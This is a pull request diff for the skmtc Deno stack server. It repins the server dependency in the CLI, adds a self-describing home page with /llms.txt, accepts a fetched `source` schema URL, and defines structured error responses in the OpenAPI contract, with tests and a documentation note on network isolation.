### PR TITLE
Stack server: self-describing home page, source URL input, structured errors

### DIFF
--- a/deno/cli/lib/ensure-server-deps.test.ts
+++ b/deno/cli/lib/ensure-server-deps.test.ts
@@ -1,0 +1,55 @@
+import { assertEquals } from '@std/assert'
+import { RootDenoJson } from '@/lib/root-deno-json.ts'
+import { readCliCorePin, readCliServerPin } from '@/lib/doctor-headless.ts'
+import { ensureServerDeps } from '@/lib/ensure-server-deps.ts'
+
+const serverPin = `jsr:@skmtc/server@${readCliServerPin()}`
+const corePin = `jsr:@skmtc/core@${readCliCorePin()}`
+
+const withImports = (imports: Record<string, string>): RootDenoJson => {
+  const denoJson = RootDenoJson.create('test-project')
+  for (const [key, value] of Object.entries(imports)) {
+    denoJson.addImport(key, value)
+  }
+  return denoJson
+}
+
+Deno.test('ensureServerDeps - pins both peers in a fresh project', () => {
+  const denoJson = withImports({})
+
+  assertEquals(ensureServerDeps(denoJson), true)
+  assertEquals(denoJson.contents.imports?.['@skmtc/server'], serverPin)
+  assertEquals(denoJson.contents.imports?.['@skmtc/core'], corePin)
+})
+
+Deno.test('ensureServerDeps - repins a stale @skmtc/server version', () => {
+  // The generated `server.ts` is rewritten from the CLI's template on every
+  // publish, so a project left on an older server release loads an entry
+  // importing symbols that release does not export.
+  const denoJson = withImports({ '@skmtc/server': 'jsr:@skmtc/server@0.2.63' })
+
+  assertEquals(ensureServerDeps(denoJson), true)
+  assertEquals(denoJson.contents.imports?.['@skmtc/server'], serverPin)
+})
+
+Deno.test('ensureServerDeps - leaves a local @skmtc/server override alone', () => {
+  const denoJson = withImports({ '@skmtc/server': '../server/mod.ts' })
+
+  ensureServerDeps(denoJson)
+  assertEquals(denoJson.contents.imports?.['@skmtc/server'], '../server/mod.ts')
+})
+
+Deno.test('ensureServerDeps - reports no change when the pins are current', () => {
+  const denoJson = withImports({ '@skmtc/server': serverPin, '@skmtc/core': corePin })
+
+  assertEquals(ensureServerDeps(denoJson), false)
+})
+
+Deno.test('ensureServerDeps - never rewrites a deliberate @skmtc/core pin', () => {
+  // Core is shared with the project's generator source, which may pin it on
+  // purpose; `skmtc doctor` warns on skew instead.
+  const denoJson = withImports({ '@skmtc/core': 'jsr:@skmtc/core@0.20.0' })
+
+  ensureServerDeps(denoJson)
+  assertEquals(denoJson.contents.imports?.['@skmtc/core'], 'jsr:@skmtc/core@0.20.0')
+})

--- a/deno/cli/lib/ensure-server-deps.test.ts
+++ b/deno/cli/lib/ensure-server-deps.test.ts
@@ -26,10 +26,29 @@ Deno.test('ensureServerDeps - repins a stale @skmtc/server version', () => {
   // The generated `server.ts` is rewritten from the CLI's template on every
   // publish, so a project left on an older server release loads an entry
   // importing symbols that release does not export.
-  const denoJson = withImports({ '@skmtc/server': 'jsr:@skmtc/server@0.2.63' })
+  //
+  // The fixture is 0.0.1 so it can never equal the CLI's own pin. Pinning a
+  // fixture to a real past release made this test vacuous: `ensureCurrentPin`
+  // took its `current === wanted` early return, and the assertion below passed
+  // on the *core* pin being added instead.
+  const denoJson = withImports({ '@skmtc/server': 'jsr:@skmtc/server@0.0.1' })
 
   assertEquals(ensureServerDeps(denoJson), true)
   assertEquals(denoJson.contents.imports?.['@skmtc/server'], serverPin)
+})
+
+Deno.test('ensureServerDeps - repins the server even when core is current', () => {
+  // Isolates `ensureCurrentPin`: core needs no work, so `changed` can only be
+  // true if the server pin was actually rewritten. Deleting `ensureCurrentPin`
+  // fails this test, which is what the case above could not do.
+  const denoJson = withImports({
+    '@skmtc/server': 'jsr:@skmtc/server@0.0.1',
+    '@skmtc/core': corePin
+  })
+
+  assertEquals(ensureServerDeps(denoJson), true)
+  assertEquals(denoJson.contents.imports?.['@skmtc/server'], serverPin)
+  assertEquals(denoJson.contents.imports?.['@skmtc/core'], corePin)
 })
 
 Deno.test('ensureServerDeps - leaves a local @skmtc/server override alone', () => {

--- a/deno/cli/lib/ensure-server-deps.ts
+++ b/deno/cli/lib/ensure-server-deps.ts
@@ -15,23 +15,55 @@ import { readCliCorePin, readCliServerPin } from '@/lib/doctor-headless.ts'
  *    import it. Pinning a matching version here avoids the
  *    two-copies-in-bundle hazard if a generator pins an older core.
  *
- * Pins are added only when **absent** — an existing pin (e.g. a
- * local-checkout override) is never overwritten. Versions come from
- * the CLI's own deno.json, consistent with `ensureWorkerDeps`.
+ * Versions come from the CLI's own deno.json, consistent with
+ * `ensureWorkerDeps`. The two pins are maintained differently:
  *
- * Returns `true` if any pin was added.
+ *  - `@skmtc/server` is a JSR pin the CLI OWNS. Nothing but the
+ *    generated `server.ts` imports it, and that file is rewritten from
+ *    the CLI's own template on every publish — so a stale JSR pin in an
+ *    already-initialized project is repinned to the CLI's version. It
+ *    has to be: an entry emitted by a newer CLI can import a symbol an
+ *    older `@skmtc/server` does not export, and the project fails at
+ *    module load with "does not provide an export named …".
+ *  - `@skmtc/core` is SHARED with the project's generator source, which
+ *    may pin a version deliberately, so it is only added when absent.
+ *    `skmtc doctor` warns on core-pin skew rather than rewriting it.
+ *
+ * A non-JSR pin (a local-checkout override such as `../server/mod.ts`)
+ * is never overwritten either way.
+ *
+ * Returns `true` if any pin was added or updated.
  */
 export const ensureServerDeps = (rootDenoJson: RootDenoJson): boolean => {
   let changed = false
 
+  const readPin = (packageName: string): string | undefined => {
+    const pin = rootDenoJson.contents.imports?.[packageName]
+    return typeof pin === 'string' ? pin : undefined
+  }
+
   const ensurePin = (packageName: string, version: string | null) => {
     if (version === null) return
-    if (rootDenoJson.contents.imports?.[packageName] !== undefined) return
+    if (readPin(packageName) !== undefined) return
     rootDenoJson.addImport(packageName, `jsr:${packageName}@${version}`)
     changed = true
   }
 
-  ensurePin('@skmtc/server', readCliServerPin())
+  /** Add the pin when absent, and repin it when it names a different JSR
+   *  version than the CLI's. A local-checkout override is left alone. */
+  const ensureCurrentPin = (packageName: string, version: string | null) => {
+    if (version === null) return
+    const current = readPin(packageName)
+    const wanted = `jsr:${packageName}@${version}`
+    if (current === wanted) return
+    if (current !== undefined && !current.startsWith(`jsr:${packageName}@`)) {
+      return
+    }
+    rootDenoJson.addImport(packageName, wanted)
+    changed = true
+  }
+
+  ensureCurrentPin('@skmtc/server', readCliServerPin())
   ensurePin('@skmtc/core', readCliCorePin())
 
   return changed

--- a/deno/cli/lib/to-server.test.ts
+++ b/deno/cli/lib/to-server.test.ts
@@ -5,7 +5,7 @@ Deno.test('toMod - generates server code with single generator', () => {
   const generatorIds = ['@skmtc/shadcn-ui']
   const result = toServer(generatorIds)
 
-  assertStringIncludes(result, "import { createServer } from '@skmtc/server'")
+  assertStringIncludes(result, "import { createServer, toStackIdentity } from '@skmtc/server'")
   assertStringIncludes(result, "import skmtcShadcnUi from '@skmtc/shadcn-ui'")
   assertStringIncludes(result, 'skmtcShadcnUi')
   assertStringIncludes(result, 'toGeneratorConfigMap')
@@ -36,7 +36,7 @@ Deno.test('toMod - generates empty generators array when no generators provided'
   const generatorIds: string[] = []
   const result = toServer(generatorIds)
 
-  assertStringIncludes(result, "import { createServer } from '@skmtc/server'")
+  assertStringIncludes(result, "import { createServer, toStackIdentity } from '@skmtc/server'")
   assertStringIncludes(
     result,
     'toGeneratorConfigMap: () => Object.fromEntries([].map(g => [g.id, g]))'

--- a/deno/cli/lib/to-server.ts
+++ b/deno/cli/lib/to-server.ts
@@ -33,11 +33,16 @@ export const toServer = (generatorIds: string[]) => {
   // cores in one bundle means the `GenerateContext` the generators receive is
   // from the wrong copy: every subject fails with `context.<method> is not a
   // function` and the run emits zero artifacts, with nothing naming a version.
+  // `server.ts` is emitted beside the project's `deno.json`, so the entry can
+  // read its own package identity (name, version, description, homepage) for
+  // the server's home page. `toStackIdentity` fails soft — a config without
+  // those fields yields the generic page.
   const server = `
-import { createServer } from '@skmtc/server'
+import { createServer, toStackIdentity } from '@skmtc/server'
+import denoConfig from './deno.json' with { type: 'json' }
 ${imports}
 
-export default createServer({toGeneratorConfigMap: () => Object.fromEntries([${generators}].map(g => [g.id, g])), logsPath: undefined})`
+export default createServer({toGeneratorConfigMap: () => Object.fromEntries([${generators}].map(g => [g.id, g])), logsPath: undefined, identity: toStackIdentity(denoConfig)})`
 
   return server
 }

--- a/deno/docs/reference/cli/publish.md
+++ b/deno/docs/reference/cli/publish.md
@@ -197,6 +197,21 @@ prefix resolving to a local path becomes `cloned`. Mixed states for
 the same generator name are rejected (`422 — composition
 inconsistency`). The root `deno.json` must be part of the upload.
 
+## Network isolation
+
+A published stack server accepts a `source` URL on `/artifacts` and
+`/to-v3-json` and fetches it server-side. The server rejects URLs whose
+hostname is a loopback, private, link-local or `.internal`/`.local` name,
+and re-checks every redirect hop — but it inspects the **hostname only**.
+A public name with a private DNS record still resolves and is fetched, and
+the fetched body comes back to the caller as the schema.
+
+The control that actually holds is the runtime's network isolation. On the
+hub, stack servers run under Deno subhosting, which has no route to an
+internal network. **Running a stack server anywhere else requires an egress
+policy in front of it** — the hostname check is defence in depth, not a
+substitute.
+
 ## Errors
 
 All errors use the uniform `ApiError` envelope (`{ code, message, … }`):

--- a/deno/server/deno.json
+++ b/deno/server/deno.json
@@ -1,6 +1,6 @@
 {
   "name": "@skmtc/server",
-  "version": "0.2.63",
+  "version": "0.3.0",
   "license": "Apache-2.0",
   "exports": {
     ".": "./mod.ts"

--- a/deno/server/mod.ts
+++ b/deno/server/mod.ts
@@ -1,1 +1,3 @@
-export { createServer } from './src/createServer.ts'
+export { createServer } from "./src/createServer.ts";
+export { homePageHtml, homePageMd } from "./src/homePage.ts";
+export type { HomePageContext, StackIdentity } from "./src/homePage.ts";

--- a/deno/server/mod.ts
+++ b/deno/server/mod.ts
@@ -1,3 +1,3 @@
 export { createServer } from "./src/createServer.ts";
-export { homePageHtml, homePageMd } from "./src/homePage.ts";
+export { homePageHtml, homePageMd, toStackIdentity } from "./src/homePage.ts";
 export type { HomePageContext, StackIdentity } from "./src/homePage.ts";

--- a/deno/server/mod.ts
+++ b/deno/server/mod.ts
@@ -1,3 +1,3 @@
-export { createServer } from "./src/createServer.ts";
-export { homePageHtml, homePageMd, toStackIdentity } from "./src/homePage.ts";
-export type { HomePageContext, StackIdentity } from "./src/homePage.ts";
+export { createServer } from './src/createServer.ts'
+export { homePageHtml, homePageMd, toStackIdentity } from './src/homePage.ts'
+export type { HomePageContext, StackIdentity } from './src/homePage.ts'

--- a/deno/server/openapi.json
+++ b/deno/server/openapi.json
@@ -2,7 +2,7 @@
   "openapi": "3.1.0",
   "info": {
     "title": "skmtc stack server",
-    "version": "1.0.0",
+    "version": "1.1.0",
     "description": "The public API of a deployed @skmtc/server bundle: generate code from an OpenAPI/GraphQL schema against the bundled generator stack, plus schema, capability and enrichment introspection. Codegen is a pure function of (bundle, schema, client settings)."
   },
   "paths": {
@@ -10,7 +10,7 @@
       "post": {
         "operationId": "generateArtifacts",
         "summary": "Generate code artifacts from a schema",
-        "description": "Parse → transform → render the posted schema through the bundled generators, returning the generated files, the run manifest, and the attribution sidecars + generation map.",
+        "description": "Parse → transform → render the schema through the bundled generators, returning the generated files, the run manifest, and the attribution sidecars + generation map. The schema arrives inline (`schema`) or by URL (`source` — fetched by the server, echoed back with its resolved URL and content digest); `protocol` is inferred from the document when omitted.",
         "requestBody": {
           "required": true,
           "content": {
@@ -56,6 +56,9 @@
                         "$ref": "#/components/schemas/GenerationMapEntry"
                       },
                       "description": "Per-Definition generation-map index (file → schema origin)."
+                    },
+                    "source": {
+                      "$ref": "#/components/schemas/ResolvedSource"
                     }
                   }
                 }
@@ -63,10 +66,24 @@
             }
           },
           "400": {
-            "description": "Malformed request body."
+            "description": "Malformed request — invalid JSON body or failed validation.",
+            "content": {
+              "application/json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ErrorResponse"
+                }
+              }
+            }
           },
           "422": {
-            "description": "Unprocessable — schema parse failure, invalid config, or generator error."
+            "description": "Unprocessable — the `source` could not be fetched, or the document could not be read as a schema.",
+            "content": {
+              "application/json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ErrorResponse"
+                }
+              }
+            }
           }
         }
       }
@@ -117,10 +134,24 @@
             }
           },
           "400": {
-            "description": "Malformed request body."
+            "description": "Malformed request — invalid JSON body or failed validation.",
+            "content": {
+              "application/json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ErrorResponse"
+                }
+              }
+            }
           },
           "422": {
-            "description": "Unprocessable — schema parse failure, invalid config, or generator error."
+            "description": "Unprocessable — the `source` could not be fetched, or the document could not be read as a schema.",
+            "content": {
+              "application/json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ErrorResponse"
+                }
+              }
+            }
           }
         }
       }
@@ -169,10 +200,24 @@
             }
           },
           "400": {
-            "description": "Malformed request body."
+            "description": "Malformed request — invalid JSON body or failed validation.",
+            "content": {
+              "application/json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ErrorResponse"
+                }
+              }
+            }
           },
           "422": {
-            "description": "Unprocessable — schema parse failure, invalid config, or generator error."
+            "description": "Unprocessable — the `source` could not be fetched, or the document could not be read as a schema.",
+            "content": {
+              "application/json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ErrorResponse"
+                }
+              }
+            }
           }
         }
       }
@@ -236,10 +281,24 @@
             }
           },
           "400": {
-            "description": "Malformed request body."
+            "description": "Malformed request — invalid JSON body or failed validation.",
+            "content": {
+              "application/json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ErrorResponse"
+                }
+              }
+            }
           },
           "422": {
-            "description": "Unprocessable — schema parse failure, invalid config, or generator error."
+            "description": "Unprocessable — the `source` could not be fetched, or the document could not be read as a schema.",
+            "content": {
+              "application/json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ErrorResponse"
+                }
+              }
+            }
           }
         }
       }
@@ -282,10 +341,24 @@
             }
           },
           "400": {
-            "description": "Malformed request body."
+            "description": "Malformed request — invalid JSON body or failed validation.",
+            "content": {
+              "application/json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ErrorResponse"
+                }
+              }
+            }
           },
           "422": {
-            "description": "Unprocessable — schema parse failure, invalid config, or generator error."
+            "description": "Unprocessable — the `source` could not be fetched, or the document could not be read as a schema.",
+            "content": {
+              "application/json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ErrorResponse"
+                }
+              }
+            }
           }
         }
       }
@@ -327,10 +400,24 @@
             }
           },
           "400": {
-            "description": "Malformed request body."
+            "description": "Malformed request — invalid JSON body or failed validation.",
+            "content": {
+              "application/json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ErrorResponse"
+                }
+              }
+            }
           },
           "422": {
-            "description": "Unprocessable — schema parse failure, invalid config, or generator error."
+            "description": "Unprocessable — the `source` could not be fetched, or the document could not be read as a schema.",
+            "content": {
+              "application/json": {
+                "schema": {
+                  "$ref": "#/components/schemas/ErrorResponse"
+                }
+              }
+            }
           }
         }
       }
@@ -339,364 +426,189 @@
   "components": {
     "schemas": {
       "ArtifactsRequest": {
-        "anyOf": [
-          {
-            "type": "object",
-            "properties": {
-              "protocol": {
-                "const": "oas"
-              },
-              "schema": {
-                "type": "string"
-              },
-              "clientSettings": {
-                "type": "object",
-                "properties": {
-                  "basePath": {
-                    "type": "string"
-                  },
-                  "schemaSource": {
-                    "type": "string"
-                  },
-                  "packages": {
-                    "type": "array",
-                    "items": {
-                      "type": "object",
-                      "properties": {
-                        "rootPath": {
-                          "type": "string"
-                        },
-                        "moduleName": {
-                          "type": "string"
-                        }
-                      },
-                      "required": [
-                        "rootPath"
-                      ]
-                    }
-                  },
-                  "enrichments": {
-                    "type": "object",
-                    "additionalProperties": {
-                      "anyOf": [
-                        {
-                          "type": "object",
-                          "additionalProperties": {}
-                        },
-                        {
-                          "type": "object",
-                          "additionalProperties": {
-                            "type": "object",
-                            "additionalProperties": {}
-                          }
-                        },
-                        {
-                          "type": "object",
-                          "additionalProperties": {
-                            "type": "object",
-                            "additionalProperties": {}
-                          }
-                        }
-                      ]
-                    }
-                  },
-                  "include": {
-                    "type": "array",
-                    "items": {
-                      "anyOf": [
-                        {
-                          "type": "object",
-                          "additionalProperties": {
-                            "type": "object",
-                            "additionalProperties": {
-                              "type": "object",
-                              "additionalProperties": {
-                                "type": "array",
-                                "items": {
-                                  "type": "string"
-                                }
-                              }
-                            }
-                          }
-                        },
-                        {
-                          "type": "object",
-                          "additionalProperties": {
-                            "type": "object",
-                            "additionalProperties": {
-                              "type": "array",
-                              "items": {
-                                "type": "string"
-                              }
-                            }
-                          }
-                        },
-                        {
-                          "type": "string"
-                        }
-                      ]
-                    }
-                  },
-                  "skip": {
-                    "type": "array",
-                    "items": {
-                      "anyOf": [
-                        {
-                          "type": "object",
-                          "additionalProperties": {
-                            "type": "object",
-                            "additionalProperties": {
-                              "type": "object",
-                              "additionalProperties": {
-                                "type": "array",
-                                "items": {
-                                  "type": "string"
-                                }
-                              }
-                            }
-                          }
-                        },
-                        {
-                          "type": "object",
-                          "additionalProperties": {
-                            "type": "object",
-                            "additionalProperties": {
-                              "type": "array",
-                              "items": {
-                                "type": "string"
-                              }
-                            }
-                          }
-                        },
-                        {
-                          "type": "string"
-                        }
-                      ]
-                    }
-                  },
-                  "anchors": {
-                    "type": "object",
-                    "properties": {
-                      "enabled": {
-                        "type": "boolean"
-                      },
-                      "out": {
-                        "type": "string"
-                      }
-                    },
-                    "required": [
-                      "enabled"
-                    ]
-                  },
-                  "inputDirs": {
-                    "type": "array",
-                    "items": {
-                      "type": "string"
-                    }
-                  },
-                  "formatter": {
-                    "type": "string"
-                  },
-                  "generatedSuffix": {
-                    "type": "string"
-                  },
-                  "ejected": {
-                    "type": "array",
-                    "items": {
-                      "type": "string"
-                    }
-                  }
-                },
-                "required": []
-              },
-              "schemaSrc": {
-                "type": "string"
-              }
-            },
-            "required": [
-              "protocol",
-              "schema"
-            ]
+        "type": "object",
+        "properties": {
+          "protocol": {
+            "enum": [
+              "oas",
+              "gql"
+            ],
+            "description": "Schema protocol. Optional — inferred from the document content when omitted (a JSON/YAML document with an `openapi` or `swagger` key is `oas`; anything else is treated as GraphQL SDL)."
           },
-          {
+          "schema": {
+            "type": "string",
+            "description": "The schema document itself, as a string."
+          },
+          "source": {
+            "type": "string",
+            "format": "uri",
+            "description": "URL of the schema document. The server fetches it (following redirects) and echoes the final URL + content digest in the response."
+          },
+          "clientSettings": {
             "type": "object",
             "properties": {
-              "protocol": {
-                "const": "gql"
-              },
-              "schema": {
+              "basePath": {
                 "type": "string"
               },
-              "clientSettings": {
+              "schemaSource": {
+                "type": "string"
+              },
+              "packages": {
+                "type": "array",
+                "items": {
+                  "type": "object",
+                  "properties": {
+                    "rootPath": {
+                      "type": "string"
+                    },
+                    "moduleName": {
+                      "type": "string"
+                    }
+                  },
+                  "required": [
+                    "rootPath"
+                  ]
+                }
+              },
+              "enrichments": {
                 "type": "object",
-                "properties": {
-                  "basePath": {
-                    "type": "string"
-                  },
-                  "schemaSource": {
-                    "type": "string"
-                  },
-                  "packages": {
-                    "type": "array",
-                    "items": {
+                "additionalProperties": {
+                  "anyOf": [
+                    {
                       "type": "object",
-                      "properties": {
-                        "rootPath": {
-                          "type": "string"
-                        },
-                        "moduleName": {
-                          "type": "string"
-                        }
-                      },
-                      "required": [
-                        "rootPath"
-                      ]
-                    }
-                  },
-                  "enrichments": {
-                    "type": "object",
-                    "additionalProperties": {
-                      "anyOf": [
-                        {
-                          "type": "object",
-                          "additionalProperties": {}
-                        },
-                        {
-                          "type": "object",
-                          "additionalProperties": {
-                            "type": "object",
-                            "additionalProperties": {}
-                          }
-                        },
-                        {
-                          "type": "object",
-                          "additionalProperties": {
-                            "type": "object",
-                            "additionalProperties": {}
-                          }
-                        }
-                      ]
-                    }
-                  },
-                  "include": {
-                    "type": "array",
-                    "items": {
-                      "anyOf": [
-                        {
-                          "type": "object",
-                          "additionalProperties": {
-                            "type": "object",
-                            "additionalProperties": {
-                              "type": "object",
-                              "additionalProperties": {
-                                "type": "array",
-                                "items": {
-                                  "type": "string"
-                                }
-                              }
-                            }
-                          }
-                        },
-                        {
-                          "type": "object",
-                          "additionalProperties": {
-                            "type": "object",
-                            "additionalProperties": {
-                              "type": "array",
-                              "items": {
-                                "type": "string"
-                              }
-                            }
-                          }
-                        },
-                        {
-                          "type": "string"
-                        }
-                      ]
-                    }
-                  },
-                  "skip": {
-                    "type": "array",
-                    "items": {
-                      "anyOf": [
-                        {
-                          "type": "object",
-                          "additionalProperties": {
-                            "type": "object",
-                            "additionalProperties": {
-                              "type": "object",
-                              "additionalProperties": {
-                                "type": "array",
-                                "items": {
-                                  "type": "string"
-                                }
-                              }
-                            }
-                          }
-                        },
-                        {
-                          "type": "object",
-                          "additionalProperties": {
-                            "type": "object",
-                            "additionalProperties": {
-                              "type": "array",
-                              "items": {
-                                "type": "string"
-                              }
-                            }
-                          }
-                        },
-                        {
-                          "type": "string"
-                        }
-                      ]
-                    }
-                  },
-                  "anchors": {
-                    "type": "object",
-                    "properties": {
-                      "enabled": {
-                        "type": "boolean"
-                      },
-                      "out": {
-                        "type": "string"
+                      "additionalProperties": {}
+                    },
+                    {
+                      "type": "object",
+                      "additionalProperties": {
+                        "type": "object",
+                        "additionalProperties": {}
                       }
                     },
-                    "required": [
-                      "enabled"
-                    ]
-                  },
-                  "inputDirs": {
-                    "type": "array",
-                    "items": {
+                    {
+                      "type": "object",
+                      "additionalProperties": {
+                        "type": "object",
+                        "additionalProperties": {}
+                      }
+                    }
+                  ]
+                }
+              },
+              "include": {
+                "type": "array",
+                "items": {
+                  "anyOf": [
+                    {
+                      "type": "object",
+                      "additionalProperties": {
+                        "type": "object",
+                        "additionalProperties": {
+                          "type": "object",
+                          "additionalProperties": {
+                            "type": "array",
+                            "items": {
+                              "type": "string"
+                            }
+                          }
+                        }
+                      }
+                    },
+                    {
+                      "type": "object",
+                      "additionalProperties": {
+                        "type": "object",
+                        "additionalProperties": {
+                          "type": "array",
+                          "items": {
+                            "type": "string"
+                          }
+                        }
+                      }
+                    },
+                    {
                       "type": "string"
                     }
-                  },
-                  "formatter": {
-                    "type": "string"
-                  },
-                  "generatedSuffix": {
-                    "type": "string"
-                  },
-                  "ejected": {
-                    "type": "array",
-                    "items": {
+                  ]
+                }
+              },
+              "skip": {
+                "type": "array",
+                "items": {
+                  "anyOf": [
+                    {
+                      "type": "object",
+                      "additionalProperties": {
+                        "type": "object",
+                        "additionalProperties": {
+                          "type": "object",
+                          "additionalProperties": {
+                            "type": "array",
+                            "items": {
+                              "type": "string"
+                            }
+                          }
+                        }
+                      }
+                    },
+                    {
+                      "type": "object",
+                      "additionalProperties": {
+                        "type": "object",
+                        "additionalProperties": {
+                          "type": "array",
+                          "items": {
+                            "type": "string"
+                          }
+                        }
+                      }
+                    },
+                    {
                       "type": "string"
                     }
+                  ]
+                }
+              },
+              "anchors": {
+                "type": "object",
+                "properties": {
+                  "enabled": {
+                    "type": "boolean"
+                  },
+                  "out": {
+                    "type": "string"
                   }
                 },
-                "required": []
+                "required": [
+                  "enabled"
+                ]
               },
-              "schemaSrc": {
+              "inputDirs": {
+                "type": "array",
+                "items": {
+                  "type": "string"
+                }
+              },
+              "formatter": {
                 "type": "string"
+              },
+              "generatedSuffix": {
+                "type": "string"
+              },
+              "ejected": {
+                "type": "array",
+                "items": {
+                  "type": "string"
+                }
               }
             },
-            "required": [
-              "protocol",
-              "schema"
-            ]
+            "required": []
+          },
+          "schemaSrc": {
+            "type": "string"
           }
-        ]
+        },
+        "required": []
       },
       "ValidateRequest": {
         "type": "object",
@@ -869,11 +781,14 @@
         "properties": {
           "schema": {
             "type": "string"
+          },
+          "source": {
+            "type": "string",
+            "format": "uri",
+            "description": "URL of the schema document. The server fetches it (following redirects) and echoes the final URL + content digest in the response."
           }
         },
-        "required": [
-          "schema"
-        ]
+        "required": []
       },
       "Manifest": {
         "type": "object",
@@ -1991,6 +1906,71 @@
           },
           "message": {
             "type": "string"
+          }
+        }
+      },
+      "ResolvedSource": {
+        "type": "object",
+        "required": [
+          "url",
+          "resolvedUrl",
+          "digest"
+        ],
+        "description": "Present when the request used `source`: the URL as requested, the final URL after redirects (keep this one — when the source redirects to a content-addressed form it pins the exact document), and a `sha256:<hex>` digest of the fetched bytes.",
+        "properties": {
+          "url": {
+            "type": "string",
+            "description": "The `source` URL as requested."
+          },
+          "resolvedUrl": {
+            "type": "string",
+            "description": "The final URL after redirects."
+          },
+          "digest": {
+            "type": "string",
+            "description": "`sha256:<hex>` digest of the fetched bytes."
+          }
+        }
+      },
+      "ErrorResponse": {
+        "type": "object",
+        "required": [
+          "error",
+          "message"
+        ],
+        "properties": {
+          "error": {
+            "type": "string",
+            "enum": [
+              "invalid_request",
+              "source_fetch_failed",
+              "invalid_schema",
+              "internal_error"
+            ],
+            "description": "Machine-readable error code."
+          },
+          "message": {
+            "type": "string",
+            "description": "What went wrong, actionably."
+          },
+          "issues": {
+            "type": "array",
+            "description": "Field-level validation issues (`invalid_request` only).",
+            "items": {
+              "type": "object",
+              "required": [
+                "message"
+              ],
+              "properties": {
+                "path": {
+                  "type": "string",
+                  "description": "Dot path of the offending field."
+                },
+                "message": {
+                  "type": "string"
+                }
+              }
+            }
           }
         }
       }

--- a/deno/server/openapi.json
+++ b/deno/server/openapi.json
@@ -690,7 +690,19 @@
             "type": "string"
           }
         },
-        "required": []
+        "required": [],
+        "oneOf": [
+          {
+            "required": [
+              "schema"
+            ]
+          },
+          {
+            "required": [
+              "source"
+            ]
+          }
+        ]
       },
       "ValidateRequest": {
         "type": "object",
@@ -870,7 +882,19 @@
             "description": "URL of the schema document. The server fetches it (following redirects, checking each hop) and echoes the final URL + content digest in the response. Must be publicly reachable: a URL naming a loopback, private, link-local or `.internal` host is refused."
           }
         },
-        "required": []
+        "required": [],
+        "oneOf": [
+          {
+            "required": [
+              "schema"
+            ]
+          },
+          {
+            "required": [
+              "source"
+            ]
+          }
+        ]
       },
       "Manifest": {
         "type": "object",

--- a/deno/server/openapi.json
+++ b/deno/server/openapi.json
@@ -2070,7 +2070,7 @@
               "properties": {
                 "path": {
                   "type": "string",
-                  "description": "Dot path of the offending field."
+                  "description": "Dot path of the offending field. Absent when the issue is a whole-body rule rather than one field — `schema`/`source` exactly-one, for instance."
                 },
                 "message": {
                   "type": "string"

--- a/deno/server/openapi.json
+++ b/deno/server/openapi.json
@@ -6,6 +6,68 @@
     "description": "The public API of a deployed @skmtc/server bundle: generate code from an OpenAPI/GraphQL schema against the bundled generator stack, plus schema, capability and enrichment introspection. Codegen is a pure function of (bundle, schema, client settings)."
   },
   "paths": {
+    "/": {
+      "get": {
+        "operationId": "homePage",
+        "summary": "The server's self-description",
+        "description": "Content-negotiated on `Accept`: a browser (`text/html`) gets the HTML page, anything else the flat markdown contract — the same text `/index.md` and `/llms.txt` serve.",
+        "responses": {
+          "200": {
+            "description": "The self-description.",
+            "content": {
+              "text/html": {
+                "schema": {
+                  "type": "string"
+                }
+              },
+              "text/markdown": {
+                "schema": {
+                  "type": "string"
+                }
+              }
+            }
+          }
+        }
+      }
+    },
+    "/index.md": {
+      "get": {
+        "operationId": "homePageMarkdown",
+        "summary": "The self-description as markdown",
+        "description": "The markdown variant of `/`, unconditionally.",
+        "responses": {
+          "200": {
+            "description": "The self-description, as markdown.",
+            "content": {
+              "text/markdown": {
+                "schema": {
+                  "type": "string"
+                }
+              }
+            }
+          }
+        }
+      }
+    },
+    "/llms.txt": {
+      "get": {
+        "operationId": "homePageLlmsTxt",
+        "summary": "The self-description at the llms.txt convention path",
+        "description": "The same markdown as `/index.md`, at the path agents look for.",
+        "responses": {
+          "200": {
+            "description": "The self-description, as markdown.",
+            "content": {
+              "text/plain": {
+                "schema": {
+                  "type": "string"
+                }
+              }
+            }
+          }
+        }
+      }
+    },
     "/artifacts": {
       "post": {
         "operationId": "generateArtifacts",
@@ -421,6 +483,26 @@
           }
         }
       }
+    },
+    "/openapi.json": {
+      "get": {
+        "operationId": "openApiDocument",
+        "summary": "This contract",
+        "description": "The server's own OpenAPI 3.1 document — the one you are reading. Served as a committed static artifact, so it is a pure function of the package version.",
+        "responses": {
+          "200": {
+            "description": "This OpenAPI document.",
+            "content": {
+              "application/json": {
+                "schema": {
+                  "type": "object",
+                  "additionalProperties": true
+                }
+              }
+            }
+          }
+        }
+      }
     }
   },
   "components": {
@@ -442,7 +524,7 @@
           "source": {
             "type": "string",
             "format": "uri",
-            "description": "URL of the schema document. The server fetches it (following redirects) and echoes the final URL + content digest in the response."
+            "description": "URL of the schema document. The server fetches it (following redirects, checking each hop) and echoes the final URL + content digest in the response. Must be publicly reachable: a URL naming a loopback, private, link-local or `.internal` host is refused."
           },
           "clientSettings": {
             "type": "object",
@@ -785,7 +867,7 @@
           "source": {
             "type": "string",
             "format": "uri",
-            "description": "URL of the schema document. The server fetches it (following redirects) and echoes the final URL + content digest in the response."
+            "description": "URL of the schema document. The server fetches it (following redirects, checking each hop) and echoes the final URL + content digest in the response. Must be publicly reachable: a URL naming a loopback, private, link-local or `.internal` host is refused."
           }
         },
         "required": []

--- a/deno/server/src/createServer.test.ts
+++ b/deno/server/src/createServer.test.ts
@@ -521,6 +521,78 @@ Deno.test("POST /artifacts - an HTML page from a source is a 422", async () => {
   );
 });
 
+Deno.test("POST /artifacts - an HTML page with explicit protocol=gql is a 422", async () => {
+  await withStubbedFetch(
+    () =>
+      new Response("<!doctype html><html><body>Sign in</body></html>", {
+        status: 200,
+        headers: { "content-type": "text/html" },
+      }),
+    async () => {
+      const app = mkApp();
+      const res = await app.request("/artifacts", {
+        method: "POST",
+        headers: { "content-type": "application/json" },
+        body: JSON.stringify({
+          source: "https://example.com/schema.graphql",
+          protocol: "gql",
+        }),
+      });
+
+      // The same page is a 422 with `protocol` omitted. Passing `protocol`
